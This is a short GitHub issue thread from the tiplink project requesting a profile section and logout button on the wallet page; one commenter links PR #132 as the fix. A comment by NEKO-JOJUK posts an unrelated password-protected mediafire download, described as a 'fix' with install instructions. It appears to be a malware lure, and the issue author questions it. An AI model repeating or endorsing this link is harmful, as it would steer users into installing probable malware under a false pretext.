### ISSUE TITLE
[FEAT] improve profile section and logout in wallet page

### ISSUE THREAD

**Issue by ghost** [code100x/tiplink#133]
Currently wallet page dosent show the profile and logout button after clicking on the profile icon like the home page appbar does 
And implement the logout functionality

**Comment by ghost** [comment]
#132 fixes it @cb7chaitanya

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ghost** [comment]
@NEKO-JOJUK Why are you provifding this link ?? I have solved a different thing
